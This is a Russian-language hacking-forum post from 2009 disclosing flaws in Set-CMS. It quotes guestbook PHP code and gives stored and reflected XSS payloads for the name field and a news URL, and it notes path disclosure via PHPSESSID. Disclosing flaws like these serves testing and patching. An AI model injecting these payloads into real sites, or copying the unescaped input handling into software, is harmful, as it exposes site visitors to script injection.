31.10.2009, 09:10
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Set-CMS
Оффициальная страничка
Активная XSS
Модуль гостевая книга
PHP код:
if ($mc == "ok")
{
$title = "Сохранение сообщения";
if (isset($_COOKIE['flood_feedback'])) {$er[] = "Флуд-защита.Подождите некоторое время...";}
if (isset($_POST['user_name'])){setcookie("user_name", $_POST['user_name'], time()+333333333);}
if (isset($_POST['user_email'])){setcookie("user_email", $_POST['user_email'], time()+333333333);}
if (isset($_POST['user_icq'])){setcookie("user_icq", $_POST['user_icq'], time()+333333333);}
if (isset($_SESSION[$uniqueid.'name_admin'])){$_POST['user_name'] = $_SESSION[$uniqueid.'name_admin'];}
if (isset($_SESSION[$uniqueid.'email_admin'])){$_POST['user_email'] = $_SESSION[$uniqueid.'email_admin'];}
if (isset($_SESSION[$uniqueid.'icq_admin'])){$_POST['user_icq'] = $_SESSION[$uniqueid.'icq_admin'];}
$text_gb = saveuser($_POST['user_text']);
$name = saveuser($_POST['user_name']);
$email = saveuser($_POST['user_email']);
$icq = saveuser($_POST['user_icq']);
$code = $_POST['code'];
if ($code == "") { $er[] = "Нет кода!"; }
$ffile = file("files/feedback.set");
for($a=0;$a<count($ffile);$a++) {
$ee = explode("<>", $ffile[$a]);
if ($ee[5] == $code)
{ $er[] = "Флудишь,мля!Отправлено только одно сообщение"; }
}
В поле "Ваше имя" вставляем
"><script>alert();</script>
Эта же бага встречается в комментариях к новостям.
Тоже поле имя.
Раскрытие путей 
Раскрытие путей с помощью PHPSESSID
Думаю обьяснения не нужны.
Пассивная XSS
/?set=news&mc=readfull&do=1"><script>alert();</script>
Последний раз редактировалось Ctacok; 31.10.2009 в 09:15..
|
|
|